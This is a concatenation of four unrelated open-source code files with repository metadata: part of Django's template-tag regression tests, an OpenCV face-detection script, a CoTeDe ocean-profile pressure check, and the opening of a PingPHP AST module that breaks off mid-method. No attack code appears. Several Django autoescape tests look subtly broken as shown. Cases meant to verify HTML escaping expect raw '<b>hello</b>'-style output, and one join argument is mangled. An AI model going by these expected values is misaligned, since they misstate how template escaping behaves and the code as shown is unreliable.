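# As elsewhere in this file, a two-tuple expected result is (output with the
# default empty invalid string, output with TEMPLATE_STRING_IF_INVALID set to
# 'INVALID'); an inner ('INVALID %s', 'var') pair means the '%s' in the
# invalid string is interpolated with the name of the missing variable.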
'invalidstr01': ('{{ var|default:"Foo" }}', {}, ('Foo','INVALID')),
'invalidstr02': ('{{ var|default_if_none:"Foo" }}', {}, ('','INVALID')),
'invalidstr03': ('{% for v in var %}({{ v }}){% endfor %}', {}, ''),
'invalidstr04': ('{% if var %}Yes{% else %}No{% endif %}', {}, 'No'),
'invalidstr04_2': ('{% if var|default:"Foo" %}Yes{% else %}No{% endif %}', {}, 'Yes'),
'invalidstr05': ('{{ var }}', {}, ('', ('INVALID %s', 'var'))),
'invalidstr06': ('{{ var.prop }}', {'var': {}}, ('', ('INVALID %s', 'var.prop'))),
### MULTILINE #############################################################
'multiline01': ("""
Hello,
boys.
How
are
you
gentlemen.
""",
{},
"""
Hello,
boys.
How
are
you
gentlemen.
"""),
### REGROUP TAG ###########################################################
'regroup01': ('{% regroup data by bar as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo }}'
'{% endfor %},'
'{% endfor %}',
{'data': [ {'foo':'c', 'bar':1},
{'foo':'d', 'bar':1},
{'foo':'a', 'bar':2},
{'foo':'b', 'bar':2},
{'foo':'x', 'bar':3} ]},
'1:cd,2:ab,3:x,'),
# Test for silent failure when target variable isn't found
'regroup02': ('{% regroup data by bar as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo }}'
'{% endfor %},'
'{% endfor %}',
{}, ''),
# Regression tests for #17675
# The date template filter has expects_localtime = True
'regroup03': ('{% regroup data by at|date:"m" as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.at|date:"d" }}'
'{% endfor %},'
'{% endfor %}',
{'data': [{'at': date(2012, 2, 14)},
{'at': date(2012, 2, 28)},
{'at': date(2012, 7, 4)}]},
'02:1428,07:04,'),
# The join template filter has needs_autoescape = True
'regroup04': ('{% regroup data by bar|join:"" as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo|first }}'
'{% endfor %},'
'{% endfor %}',
{'data': [{'foo': 'x', 'bar': ['ab', 'c']},
{'foo': 'y', 'bar': ['a', 'bc']},
{'foo': 'z', 'bar': ['a', 'd']}]},
'abc:xy,ad:z,'),
### SSI TAG ########################################################
# Test normal behavior
'ssi01': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'templates', 'ssi_include.html'), {}, 'This is for testing an ssi include. {{ test }}\n'),
'ssi02': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'not_here'), {}, ''),
'ssi03': ("{%% ssi '%s' %%}" % os.path.join(basedir, 'not_here'), {}, ''),
# Test passing as a variable
'ssi04': ('{% load ssi from future %}{% ssi ssi_file %}', {'ssi_file': os.path.join(basedir, 'templates', 'ssi_include.html')}, 'This is for testing an ssi include. {{ test }}\n'),
'ssi05': ('{% load ssi from future %}{% ssi ssi_file %}', {'ssi_file': 'no_file'}, ''),
# Test parsed output
'ssi06': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'templates', 'ssi_include.html'), {'test': 'Look ma! It parsed!'}, 'This is for testing an ssi include. Look ma! It parsed!\n'),
'ssi07': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'not_here'), {'test': 'Look ma! It parsed!'}, ''),
# Test space in file name
'ssi08': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'templates', 'ssi include with spaces.html'), {}, 'This is for testing an ssi include with spaces in its name. {{ test }}\n'),
'ssi09': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'templates', 'ssi include with spaces.html'), {'test': 'Look ma! It parsed!'}, 'This is for testing an ssi include with spaces in its name. Look ma! It parsed!\n'),
### TEMPLATETAG TAG #######################################################
'templatetag01': ('{% templatetag openblock %}', {}, '{%'),
'templatetag02': ('{% templatetag closeblock %}', {}, '%}'),
'templatetag03': ('{% templatetag openvariable %}', {}, '{{'),
'templatetag04': ('{% templatetag closevariable %}', {}, '}}'),
'templatetag05': ('{% templatetag %}', {}, template.TemplateSyntaxError),
'templatetag06': ('{% templatetag foo %}', {}, template.TemplateSyntaxError),
'templatetag07': ('{% templatetag openbrace %}', {}, '{'),
'templatetag08': ('{% templatetag closebrace %}', {}, '}'),
'templatetag09': ('{% templatetag openbrace %}{% templatetag openbrace %}', {}, '{{'),
'templatetag10': ('{% templatetag closebrace %}{% templatetag closebrace %}', {}, '}}'),
'templatetag11': ('{% templatetag opencomment %}', {}, '{#'),
'templatetag12': ('{% templatetag closecomment %}', {}, '#}'),
# Simple tags with customized names
'simpletag-renamed01': ('{% load custom %}{% minusone 7 %}', {}, '6'),
'simpletag-renamed02': ('{% load custom %}{% minustwo 7 %}', {}, '5'),
'simpletag-renamed03': ('{% load custom %}{% minustwo_overridden_name 7 %}', {}, template.TemplateSyntaxError),
### WIDTHRATIO TAG ########################################################
'widthratio01': ('{% widthratio a b 0 %}', {'a':50,'b':100}, '0'),
'widthratio02': ('{% widthratio a b 100 %}', {'a':0,'b':0}, '0'),
'widthratio03': ('{% widthratio a b 100 %}', {'a':0,'b':100}, '0'),
'widthratio04': ('{% widthratio a b 100 %}', {'a':50,'b':100}, '50'),
'widthratio05': ('{% widthratio a b 100 %}', {'a':100,'b':100}, '100'),
# 62.5 should round to 63
'widthratio06': ('{% widthratio a b 100 %}', {'a':50,'b':80}, '63'),
# 71.4 should round to 71
'widthratio07': ('{% widthratio a b 100 %}', {'a':50,'b':70}, '71'),
# Raise exception if we don't have 3 args, last one an integer
'widthratio08': ('{% widthratio %}', {}, template.TemplateSyntaxError),
'widthratio09': ('{% widthratio a b %}', {'a':50,'b':100}, template.TemplateSyntaxError),
'widthratio10': ('{% widthratio a b 100.0 %}', {'a':50,'b':100}, '50'),
# #10043: widthratio should allow max_width to be a variable
'widthratio11': ('{% widthratio a b c %}', {'a':50,'b':100, 'c': 100}, '50'),
### WITH TAG ########################################################
'with01': ('{% with key=dict.key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, '50'),
'legacywith01': ('{% with dict.key as key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, '50'),
'with02': ('{{ key }}{% with key=dict.key %}{{ key }}-{{ dict.key }}-{{ key }}{% endwith %}{{ key }}', {'dict': {'key': 50}}, ('50-50-50', 'INVALID50-50-50INVALID')),
'legacywith02': ('{{ key }}{% with dict.key as key %}{{ key }}-{{ dict.key }}-{{ key }}{% endwith %}{{ key }}', {'dict': {'key': 50}}, ('50-50-50', 'INVALID50-50-50INVALID')),
'with03': ('{% with a=alpha b=beta %}{{ a }}{{ b }}{% endwith %}', {'alpha': 'A', 'beta': 'B'}, 'AB'),
'with-error01': ('{% with dict.key xx key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, template.TemplateSyntaxError),
'with-error02': ('{% with dict.key as %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, template.TemplateSyntaxError),
### NOW TAG ########################################################
# Simple case
'now01': ('{% now "j n Y" %}', {}, "%d %d %d" % (
datetime.now().day, datetime.now().month, datetime.now().year)),
# Check parsing of locale strings
'now02': ('{% now "DATE_FORMAT" %}', {}, date_format(datetime.now())),
# Also accept single quotes - #15092
'now03': ("{% now 'j n Y' %}", {}, "%d %d %d" % (
datetime.now().day, datetime.now().month, datetime.now().year)),
'now04': ("{% now 'DATE_FORMAT' %}", {}, date_format(datetime.now())),
'now05': ('''{% now 'j "n" Y'%}''', {}, '''%d "%d" %d''' % (
datetime.now().day, datetime.now().month, datetime.now().year)),
'now06': ('''{% now "j 'n' Y"%}''', {}, '''%d '%d' %d''' % (
datetime.now().day, datetime.now().month, datetime.now().year)),
### URL TAG ########################################################
# Successes
'url01': ('{% url "regressiontests.templates.views.client" client.id %}', {'client': {'id': 1}}, '/url_tag/client/1/'),
'url02': ('{% url "regressiontests.templates.views.client_action" id=client.id action="update" %}', {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02a': ('{% url "regressiontests.templates.views.client_action" client.id "update" %}', {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02b': ("{% url 'regressiontests.templates.views.client_action' id=client.id action='update' %}", {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02c': ("{% url 'regressiontests.templates.views.client_action' client.id 'update' %}", {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url03': ('{% url "regressiontests.templates.views.index" %}', {}, '/url_tag/'),
'url04': ('{% url "named.client" client.id %}', {'client': {'id': 1}}, '/url_tag/named-client/1/'),
'url05': ('{% url "метка_оператора" v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url06': ('{% url "метка_оператора_2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url07': ('{% url "regressiontests.templates.views.client2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url08': ('{% url "метка_оператора" v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url09': ('{% url "метка_оператора_2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url10': ('{% url "regressiontests.templates.views.client_action" id=client.id action="two words" %}', {'client': {'id': 1}}, '/url_tag/client/1/two%20words/'),
'url11': ('{% url "regressiontests.templates.views.client_action" id=client.id action="==" %}', {'client': {'id': 1}}, '/url_tag/client/1/==/'),
'url12': ('{% url "regressiontests.templates.views.client_action" id=client.id action="," %}', {'client': {'id': 1}}, '/url_tag/client/1/,/'),
'url13': ('{% url "regressiontests.templates.views.client_action" id=client.id action=arg|join:"-" %}', {'client': {'id': 1}, 'arg':['a','b']}, '/url_tag/client/1/a-b/'),
'url14': ('{% url "regressiontests.templates.views.client_action" client.id arg|join:"-" %}', {'client': {'id': 1}, 'arg':['a','b']}, '/url_tag/client/1/a-b/'),
'url15': ('{% url "regressiontests.templates.views.client_action" 12 "test" %}', {}, '/url_tag/client/12/test/'),
'url18': ('{% url "regressiontests.templates.views.client" "1,2" %}', {}, '/url_tag/client/1,2/'),
'url19': ('{% url named_url client.id %}', {'named_url': 'regressiontests.templates.views.client', 'client': {'id': 1}}, '/url_tag/client/1/'),
'url20': ('{% url url_name_in_var client.id %}', {'url_name_in_var': 'named.client', 'client': {'id': 1}}, '/url_tag/named-client/1/'),
# Failures
'url-fail01': ('{% url %}', {}, template.TemplateSyntaxError),
'url-fail02': ('{% url "no_such_view" %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail03': ('{% url "regressiontests.templates.views.client" %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail04': ('{% url "view" id, %}', {}, template.TemplateSyntaxError),
'url-fail05': ('{% url "view" id= %}', {}, template.TemplateSyntaxError),
'url-fail06': ('{% url "view" a.id=id %}', {}, template.TemplateSyntaxError),
'url-fail07': ('{% url "view" a.id!id %}', {}, template.TemplateSyntaxError),
'url-fail08': ('{% url "view" id="unterminatedstring %}', {}, template.TemplateSyntaxError),
'url-fail09': ('{% url "view" id=", %}', {}, template.TemplateSyntaxError),
'url-fail11': ('{% url named_url %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail12': ('{% url named_url %}', {'named_url': 'no_such_view'}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail13': ('{% url named_url %}', {'named_url': 'regressiontests.templates.views.client'}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail14': ('{% url named_url id, %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail15': ('{% url named_url id= %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail16': ('{% url named_url a.id=id %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail17': ('{% url named_url a.id!id %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail18': ('{% url named_url id="unterminatedstring %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail19': ('{% url named_url id=", %}', {'named_url': 'view'}, template.TemplateSyntaxError),
# {% url ... as var %}
'url-asvar01': ('{% url "regressiontests.templates.views.index" as url %}', {}, ''),
'url-asvar02': ('{% url "regressiontests.templates.views.index" as url %}{{ url }}', {}, '/url_tag/'),
'url-asvar03': ('{% url "no_such_view" as url %}{{ url }}', {}, ''),
### CACHE TAG ######################################################
'cache03': ('{% load cache %}{% cache 2 test %}cache03{% endcache %}', {}, 'cache03'),
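# cache04 and cache07 deliberately expect the output of earlier entries:
# they hit the fragment already cached under the same key and vary-on values.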
'cache04': ('{% load cache %}{% cache 2 test %}cache04{% endcache %}', {}, 'cache03'),
'cache05': ('{% load cache %}{% cache 2 test foo %}cache05{% endcache %}', {'foo': 1}, 'cache05'),
'cache06': ('{% load cache %}{% cache 2 test foo %}cache06{% endcache %}', {'foo': 2}, 'cache06'),
'cache07': ('{% load cache %}{% cache 2 test foo %}cache07{% endcache %}', {'foo': 1}, 'cache05'),
# Allow first argument to be a variable.
'cache08': ('{% load cache %}{% cache time test foo %}cache08{% endcache %}', {'foo': 2, 'time': 2}, 'cache06'),
# Raise exception if we don't have at least 2 args, first one integer.
'cache11': ('{% load cache %}{% cache %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache12': ('{% load cache %}{% cache 1 %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache13': ('{% load cache %}{% cache foo bar %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache14': ('{% load cache %}{% cache foo bar %}{% endcache %}', {'foo': 'fail'}, template.TemplateSyntaxError),
'cache15': ('{% load cache %}{% cache foo bar %}{% endcache %}', {'foo': []}, template.TemplateSyntaxError),
# Regression test for #7460.
'cache16': ('{% load cache %}{% cache 1 foo bar %}{% endcache %}', {'foo': 'foo', 'bar': 'with spaces'}, ''),
# Regression test for #11270.
'cache17': ('{% load cache %}{% cache 10 long_cache_key poem %}Some Content{% endcache %}', {'poem': 'Oh freddled gruntbuggly/Thy micturations are to me/As plurdled gabbleblotchits/On a lurgid bee/That mordiously hath bitled out/Its earted jurtles/Into a rancid festering/Or else I shall rend thee in the gobberwarts with my blurglecruncheon/See if I dont.'}, 'Some Content'),
### AUTOESCAPE TAG ##############################################
'autoescape-tag01': ("{% autoescape off %}hello{% endautoescape %}", {}, "hello"),
'autoescape-tag02': ("{% autoescape off %}{{ first }}{% endautoescape %}", {"first": "<b>hello</b>"}, "<b>hello</b>"),
'autoescape-tag03': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": "<b>hello</b>"}, "<b>hello</b>"),
# Autoescape disabling and enabling nest in a predictable way.
'autoescape-tag04': ("{% autoescape off %}{{ first }} {% autoescape on%}{{ first }}{% endautoescape %}{% endautoescape %}", {"first": "<a>"}, "<a> <a>"),
'autoescape-tag05': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": "<b>first</b>"}, "<b>first</b>"),
# Strings (ASCII or unicode) already marked as "safe" are not
# auto-escaped
'autoescape-tag06': ("{{ first }}", {"first": mark_safe("<b>first</b>")}, "<b>first</b>"),
'autoescape-tag07': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": mark_safe("<b>Apple</b>")}, "<b>Apple</b>"),
# Literal string arguments to filters, if used in the result, are
# safe.
'autoescape-tag08': (r'{% autoescape on %}{{ var|default_if_none:" endquote\" hah" }}{% endautoescape %}', {"var": None}, ' endquote" hah'),
# Objects which return safe strings as their __unicode__ method
# won't get double-escaped.
'autoescape-tag09': (r'{{ unsafe }}', {'unsafe': filters.UnsafeClass()}, 'you & me'),
'autoescape-tag10': (r'{{ safe }}', {'safe': filters.SafeClass()}, 'you > me'),
# The "safe" and "escape" filters cannot work due to internal
# implementation details (fortunately, the (no)autoescape block
# tags can be used in those cases)
'autoescape-filtertag01': ("{{ first }}{% filter safe %}{{ first }} x<y{% endfilter %}", {"first": "<a>"}, template.TemplateSyntaxError),
# ifequal compares unescaped values.
'autoescape-ifequal01': ('{% ifequal var "this & that" %}yes{% endifequal %}', { "var": "this & that" }, "yes"),
# Arguments to filters are 'safe' and manipulate their input unescaped.
'autoescape-filters01': ('{{ var|cut:"&" }}', { "var": "this & that" }, "this that" ),
'autoescape-filters02': ('{{ var|join:" & \" }}', { "var": ("Tom", "Dick", "Harry") }, "Tom & Dick & Harry"),
# Literal strings are safe.
'autoescape-literals01': ('{{ "this & that" }}',{}, "this & that"),
# Iterating over strings outputs safe characters.
'autoescape-stringiterations01': ('{% for l in var %}{{ l }},{% endfor %}', {'var': 'K&R'}, "K,&,R,"),
# Escape requirement survives lookup.
'autoescape-lookup01': ('{{ var.key }}', { "var": {"key": "this & that" }}, "this & that"),
# Static template tags
'static-prefixtag01': ('{% load static %}{% get_static_prefix %}', {}, settings.STATIC_URL),
'static-prefixtag02': ('{% load static %}{% get_static_prefix as static_prefix %}{{ static_prefix }}', {}, settings.STATIC_URL),
'static-prefixtag03': ('{% load static %}{% get_media_prefix %}', {}, settings.MEDIA_URL),
'static-prefixtag04': ('{% load static %}{% get_media_prefix as media_prefix %}{{ media_prefix }}', {}, settings.MEDIA_URL),
'static-statictag01': ('{% load static %}{% static "admin/base.css" %}', {}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag02': ('{% load static %}{% static base_css %}', {'base_css': 'admin/base.css'}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag03': ('{% load static %}{% static "admin/base.css" as foo %}{{ foo }}', {}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag04': ('{% load static %}{% static base_css as foo %}{{ foo }}', {'base_css': 'admin/base.css'}, urljoin(settings.STATIC_URL, 'admin/base.css')),
# Verbatim template tag outputs contents without rendering.
'verbatim-tag01': ('{% verbatim %}{{bare }}{% endverbatim %}', {}, '{{bare }}'),
'verbatim-tag02': ('{% verbatim %}{% endif %}{% endverbatim %}', {}, '{% endif %}'),
'verbatim-tag03': ("{% verbatim %}It's the {% verbatim %} tag{% endverbatim %}", {}, "It's the {% verbatim %} tag"),
'verbatim-tag04': ('{% verbatim %}{% verbatim %}{% endverbatim %}{% endverbatim %}', {}, template.TemplateSyntaxError),
'verbatim-tag05': ('{% verbatim %}{% endverbatim %}{% verbatim %}{% endverbatim %}', {}, ''),
'verbatim-tag06': ("{% verbatim special %}Don't {% endverbatim %} just yet{% endverbatim special %}", {}, "Don't {% endverbatim %} just yet"),
}
return tests
class TemplateTagLoading(unittest.TestCase):
def setUp(self):
self.old_path = sys.path[:]
self.old_apps = settings.INSTALLED_APPS
self.egg_dir = '%s/eggs' % os.path.dirname(__file__)
self.old_tag_modules = template_base.templatetags_modules
template_base.templatetags_modules = []
def tearDown(self):
settings.INSTALLED_APPS = self.old_apps
sys.path = self.old_path
template_base.templatetags_modules = self.old_tag_modules
def test_load_error(self):
ttext = "{% load broken_tag %}"
self.assertRaises(template.TemplateSyntaxError, template.Template, ttext)
try:
template.Template(ttext)
except template.TemplateSyntaxError as e:
self.assertTrue('ImportError' in e.args[0])
self.assertTrue('Xtemplate' in e.args[0])
def test_load_error_egg(self):
ttext = "{% load broken_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
sys.path.append(egg_name)
settings.INSTALLED_APPS = ('tagsegg',)
self.assertRaises(template.TemplateSyntaxError, template.Template, ttext)
try:
template.Template(ttext)
except template.TemplateSyntaxError as e:
self.assertTrue('ImportError' in e.args[0])
self.assertTrue('Xtemplate' in e.args[0])
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
sys.path.append(egg_name)
settings.INSTALLED_APPS = ('tagsegg',)
t = template.Template(ttext)
class RequestContextTests(unittest.TestCase):
def setUp(self):
templates = {
'child': Template('{{ var|default:"none" }}'),
}
setup_test_template_loader(templates)
self.fake_request = RequestFactory().get('/')
def tearDown(self):
restore_template_loaders()
def test_include_only(self):
"""
Regression test for #15721, ``{% include %}`` and ``RequestContext``
not playing together nicely.
"""
ctx = RequestContext(self.fake_request, {'var': 'parent'})
self.assertEqual(
template.Template('{% include "child" %}').render(ctx),
'parent'
)
self.assertEqual(
template.Template('{% include "child" only %}').render(ctx),
'none'
)
|
{
"content_hash": "f3a4c9052a0b3a7ae955700aaeb7218c",
"timestamp": "",
"source": "github",
"line_count": 1699,
"max_line_length": 388,
"avg_line_length": 65.37257210123602,
"alnum_prop": 0.5152879317175064,
"repo_name": "aleida/django",
"id": "4aa71f97094e9328d1c1a965e6b44c7795a3f557",
"size": "111206",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/regressiontests/templates/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50207"
},
{
"name": "JavaScript",
"bytes": "89078"
},
{
"name": "Python",
"bytes": "8135526"
},
{
"name": "Shell",
"bytes": "11901"
}
],
"symlink_target": ""
}
|
import sys
import cv
import glob
def detect(image):
image_size = cv.GetSize(image)
# create grayscale version
grayscale = cv.CreateImage(image_size, 8, 1)
cv.CvtColor(image, grayscale, cv.CV_BGR2GRAY)
# create storage
storage = cv.CreateMemStorage(0)
# equalize histogram
cv.EqualizeHist(grayscale, grayscale)
# show processed image
#cv.ShowImage('Processed', grayscale)
# detect objects
cascade = cv.Load('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_alt.xml')
faces = cv.HaarDetectObjects(grayscale, cascade, storage, 1.2, 2, cv.CV_HAAR_DO_CANNY_PRUNING)
if faces:
for i in faces:
cv.Rectangle(image,
(i[0][0], i[0][1]),
(i[0][0] + i[0][2], i[0][1] + i[0][3]),
(0, 0, 255),
1,
8,
0)
print 'face detection by opencv2'
src = '../tests/images/*.jpg'
images = glob.glob(src)
for f in images:
print f
# create windows
cv.NamedWindow(f, cv.CV_WINDOW_AUTOSIZE)
#cv.NamedWindow('Processed', cv.CV_WINDOW_AUTOSIZE)
#read image
frame = cv.LoadImage(f)
# face detection
detect(frame)
# display image
cv.ShowImage(f, frame)
while 1:
# do forever
# handle events
k = cv.WaitKey(10)
if k == 0x1b: # ESC
print 'ESC pressed. Exiting ...'
break
|
{
"content_hash": "93adb8b6cccef496d24ecdafe2cb58d1",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 98,
"avg_line_length": 24.719298245614034,
"alnum_prop": 0.5862313697657914,
"repo_name": "masgari/peach",
"id": "8377c035ab41458934a4b739c7f6b0eef13f0b9b",
"size": "1409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "face-engine/test_learning/face_detect.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "165500"
},
{
"name": "JavaScript",
"bytes": "680768"
},
{
"name": "Python",
"bytes": "12182"
}
],
"symlink_target": ""
}
|
"""
8. Pressure increasing test
This test requires that the profile has pressures that are monotonically increasing (assuming the pressures are ordered from smallest to largest).
Action: If there is a region of constant pressure, all but the first of a consecutive set of constant pressures should be flagged as bad data. If there is a region where pressure reverses, all of the pressures in the reversed part of the profile should be flagged as bad data. All pressures flagged as bad data and all of the associated temperatures and salinities are removed from the TESAC distributed on the GTS.
"""
import logging
import numpy as np
from numpy import ma
from .qctests import QCCheckVar
module_logger = logging.getLogger(__name__)
class MonotonicZ(QCCheckVar):
"""Check if sensor vertical movement is monotonic
This is usually called Increasing Depth, Increasing Pressure ...
    Most of the implementations define a stop or an inversion in the
    vertical movement as bad data.
cfg[coord, tolerance]
"""
coord = "depth"
def test(self):
"""
coord = depth
tolerance = 0.0
"""
self.flags = {}
if "coord" in self.cfg:
self.coord = self.cfg["coord"]
z = self[self.coord]
assert np.shape(self[self.varname]) == np.shape(z)
flag = np.zeros(self[self.varname].shape, dtype="i1")
dz = np.diff(z)
if np.all(dz > 0):
flag[:] = self.flag_good
else:
flag[0] = self.flag_good
zmax = z[0]
for i, zn in enumerate(z[1:], 1):
if zn > zmax:
zmax = zn
flag[i] = self.flag_good
else:
flag[i] = self.flag_bad
flag[ma.getmaskarray(z)] = 9
if "flag_name" in self.cfg:
flag_name = self.cfg["flag_name"]
else:
flag_name = "monotonic_{}".format(self.cfg["coord"].lower())
self.flags[flag_name] = flag
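if __name__ == "__main__":
    # Illustrative sketch only, not CoTeDe's API: a standalone rendering of the
    # flagging rule described in the module docstring, using the numpy import
    # above. The helper name `demo_flags` and the flag numbers (1 = good,
    # 4 = bad) are assumptions made for this demo, not values read from the
    # MonotonicZ class.
    def demo_flags(z):
        z = np.asarray(z, dtype=float)
        flags = np.ones(z.shape, dtype="i1")
        zmax = z[0]
        for i, zn in enumerate(z[1:], 1):
            if zn > zmax:
                zmax = zn
            else:
                # Repeated or reversed pressure: everything but the first
                # occurrence of the running maximum is flagged bad.
                flags[i] = 4
        return flags
    # A profile with a repeated pressure (102, 102) and a reversal (98):
    print(demo_flags([100, 101, 102, 102, 103, 98, 104]))  # -> [1 1 1 4 1 4 1]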
|
{
"content_hash": "9c9dc686472e7ba4a63351e20104e989",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 415,
"avg_line_length": 30.46268656716418,
"alnum_prop": 0.6046055854973053,
"repo_name": "castelao/CoTeDe",
"id": "636a42f2e9594d1354ec79e61f4753775709d29b",
"size": "2152",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cotede/qctests/monotonic_z.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "178847"
},
{
"name": "TeX",
"bytes": "2430"
}
],
"symlink_target": ""
}
|
'''
PingPHP AST nodes
'''
indentLevel = 0
outputString = []
def indent():
global indentLevel
indentLevel += 1
def outdent():
global indentLevel
indentLevel -= 1
def append(val):
global outputString
if isinstance(val, list):
outputString.extend(val)
else:
outputString.append(val)
def finishOutput():
global outputString
# printObj(outputString)
res = ''.join(outputString)
initOutput()
return res
def initOutput():
global outputString, indentLevel
indentLevel = 0
outputString = ['<?php', '\n']
def popStr():
global outputString
outputString.pop()
def popStrToLastNewLine():
while lastStr() != '\n':
popStr()
popStr()
def lastStr():
global outputString
return outputString[-1]
def indentSpaces():
global indentLevel
return ''.join([' ' for i in range(0, indentLevel)])
''' Node classes '''
class BaseNode(object):
def __init__(self, val):
self.val = val
def gen(self):
if self.val:
from .helper import isString
if isString(self.val):
append(self.val)
elif hasattr(self.val, 'gen'):
self.val.gen()
class WithTerminatorNode(BaseNode):
def __init__(self, val, terminator):
super(WithTerminatorNode, self).__init__(val)
self.terminator = terminator
class UnaryOperationNode(BaseNode):
def __init__(self, op, exp):
super(UnaryOperationNode, self).__init__(op)
self.exp = exp
def gen(self):
super(UnaryOperationNode, self).gen()
self.exp.gen()
class UnaryOperationWithSpaceNode(UnaryOperationNode):
def gen(self):
super(UnaryOperationWithSpaceNode, self).gen()
append(' ')
self.exp.gen()
class BinaryOperationNode(BaseNode):
def __init__(self, exp1, op, exp2):
super(BinaryOperationNode, self).__init__(op)
self.exp1 = exp1
self.exp2 = exp2
def gen(self):
self.exp1.gen()
append([' ', self.val, ' '])
self.exp2.gen()
class Root(BaseNode):
def gen(self):
initOutput()
super(Root, self).gen()
return finishOutput()
class Body(BaseNode):
def __init__(self, body, val):
self.body = body
super(Body, self).__init__(val)
def gen(self):
if self.body != None:
self.body.gen()
super(Body, self).gen()
'''
indent is Line's duty
'''
class Line(BaseNode):
def gen(self):
append(indentSpaces())
super(Line, self).gen()
append('\n')
class Embeded(BaseNode):
pass
class Statement(WithTerminatorNode):
def __init__(self, val, terminator):
super(Statement, self).__init__(val, terminator)
def gen(self):
super(Statement, self).gen()
if not self.val.val == '':
append('; ')
self.terminator.gen()
else:
popStrToLastNewLine()
class StatementWithoutTerminator(BaseNode):
pass
class StaticVarDef(BaseNode):
def __init__(self, id_, init):
super(StaticVarDef, self).__init__(id_)
self.init = init
def gen(self):
append('static $')
super(StaticVarDef, self).gen()
self.init.gen()
class JustStrStatement(WithTerminatorNode):
def __init__(self, val, args, terminator):
super(JustStrStatement, self).__init__(val, terminator)
self.args = args
def gen(self):
if not self.val == 'pass':
super(JustStrStatement, self).gen()
if self.args.val:
append(' ')
self.args.gen()
append('; ')
self.terminator.gen()
else:
popStrToLastNewLine()
class CodeBlock(BaseNode):
pass
class Expression(BaseNode):
pass
class ParentExp(BaseNode):
def gen(self):
append('(')
super(ParentExp, self).gen()
append(')')
class AccessObj(BaseNode):
def __init__(self, exp1, id_, exp2):
super(AccessObj, self).__init__(exp1)
self.id_ = id_
self.exp2 = exp2
def gen(self):
super(AccessObj, self).gen()
if self.id_:
append(['->', self.id_])
else:
append('[')
self.exp2 and self.exp2.gen()
append(']')
class Block(BaseNode):
def gen(self):
indent()
super(Block, self).gen()
outdent()
class InitModifier(BaseNode):
pass
class AssignRightSide(BaseNode):
def __init__(self, assign, exp):
super(AssignRightSide, self).__init__(assign)
self.exp = exp
def gen(self):
append(' ')
super(AssignRightSide, self).gen()
append(' ')
self.exp.gen()
class Value(BaseNode):
pass
class Literal(BaseNode):
pass
class SimpleLiteral(BaseNode):
pass
class ArrayLiteral(BaseNode):
def gen(self):
append('[')
super(ArrayLiteral, self).gen()
append(']')
class CommaList(BaseNode):
def __init__(self, list_, val):
super(CommaList, self).__init__(val)
self.list_ = list_
def gen(self):
